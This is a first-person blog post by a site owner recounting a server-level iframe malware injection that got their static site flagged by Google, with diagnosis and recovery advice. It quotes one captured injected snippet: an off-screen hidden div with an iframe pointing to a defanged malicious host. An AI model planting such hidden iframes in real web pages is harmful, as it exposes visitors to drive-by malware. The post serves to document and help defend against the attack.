Server Injected iFrame Malware Links
Server injected iFrame malware links are a nightmare with no easy fix. “What,” I hear you you ask, “are server injected iFrame malware links?” Let me start at the beginning…
I recently had the misfortune to have one of my main sites flagged by Google as containing malware. The first I knew about it was an email from Google.
Not only does a visitor’s browser get a full page malware warning your Google listings will show your site as being compromised too. The physical effect was devastating – 95% of my traffic gone and 95% of my income with it.
Quite frankly the emotional effect was equally devastating. If you have never had it happen to you (I hadn’t in 13 years of owning and running websites) you wouldn’t believe how personal it feels.
At first I thought the files had been hacked but running CPanel’s scanner showed nothing out of the ordinary. I downloaded all the files and scanned them and again nothing showed.
I tried searching for small snippets of the code and nothing. In addition I searched all files looking for base 64 code using a script (Redleg’s base 64 finder) and… nothing!
My site files seemed fine. The malicious code was apparently being generated on the fly and injected by the server. My site hadn’t been hacked – the server had. What it meant was the Apache server had been infected and compromised at root level.
Using an online file viewer (I used Redleg’s File Viewer) I went through page after page of my website and it took over an hour to find an infected page appear.
The first snippet of injected code went in ahead of the </head> tag and the rest went in after it and ahead of the <body> tag.
<![endif]--> <meta http-equiv='x-ua-compatible' content='IE=EmulateIE9'></head><style>.vvxwwhinba{position:absolute;top:-2507px}</style><div class="vvxwwhinba"><iframe src=hxxp://sjetslpkle.serveftp.com/wordpress/?bf7N&utm_source=le" width="328" height="100"></iframe></div> <body>
Looking at the source code of the very same page less than one minute later and this is what was seen:
<![endif]--> </head> <body>
The inserted code was gone. This server injection was stealthy and really smart. I never did get the code to appear twice on the same page. Not being able to replicate the malware injection made it really hard to track down. Which means your hosting company is going to be somewhat reticent to believe any accusation of the server itself being compromised as they can’t replicate your problem.
Repeated investigation in this way showed that the inserted code was constantly changing which makes searching your files to double check they’re not infected even harder.
Online Research Provided Some Clues
After a lot of online research I found that the symptoms my site was experiencing seemed incredibly similar to a widespread malware attack on WP sites a couple of years back in 2013. That was nicknamed “Darkleech.” Even though my site is static html and not WP the similarities were remarkable. It seemed quite possible that this was a variant.
The one thing I learnt from browsing numerous articles about Darkleech was that the only fix (certainly at that time) was to reformat the server and restore everything from from an earlier non-compromised image. Good luck in trying to get your hosting company to go down that road if you are one of the first on the server to be attacked!
Incidentally, I would highly recommend anyone finding themselves in the same boat to post in the Google Webmaster’s Forum. Look for the “Security, Malware & Hacked Sites” discussion. The people there are incredibly helpful and will help you retain some of your sanity while the world seems to be crumbling around you. Listen to the suggestions they have to make and be polite – manners cost nothing. They are not Google employees but people like you and I and they are giving up their time to help you free of charge.
After all this trauma was over we were contacted by the author of one of the articles referenced in the Google Webmaster’s Forum and he pointed us at another article which was more up to date. You can find out more about the variant of Darkleech he was referencing by clicking here.
So What Do You Do?
Google recommends taking your site down immediately to protect your visitors. The problem with that is with the site files themselves not infected the only way I could get representative samples of what was happening injected code-wise was to leave the site live for long enough to do so. It’s a catch 22. If you leave the site live you risk your visitors and if you take it down you can’t investigate and get proof the server is the problem. The people responsible for hacking the server and planting the code that enables server injected iframe malware links really know what they are doing.
Once you know for sure what is going on take the site down and get it moved it to a new server as fast as you can. Quite frankly (and assuming you don’t want to change your hosting company) it is faster to ask for it to be moved than it is to try and get them to believe the problem is their server! Once it has propagated check your files with a file viewer once again until you are absolutely sure that the new server is not similarly compromised.
Once You’ve Put the Fire Out
Once you are sure then, and only then, ask Google to review your site through your webmaster account so that the red screen of death browser warning can be removed. I use Chrome but it did not take long for other browsers to start showing similar warnings. Server injected iFrame malware links are a real website traffic killer.
I can only assume that this variant is quite new. I believe Google’s “threat check” review is usually automated and is completed within 24 hours. Our check was not automated and apparently was done by man and not machine. It was a very long 48 hours!
This whole event lasted about 10 days in total and it cost me well over $1000 in lost revenue. To paraphrase a quote by Bill Pardy from the movie “Slither” – “My easy-going nature was sorely f***in’ tested.”
Disclosure: Triquetra Design is a website that features professional articles and/or reviews. As such I may receive compensation from the companies whose products I review or from companies that advertise here.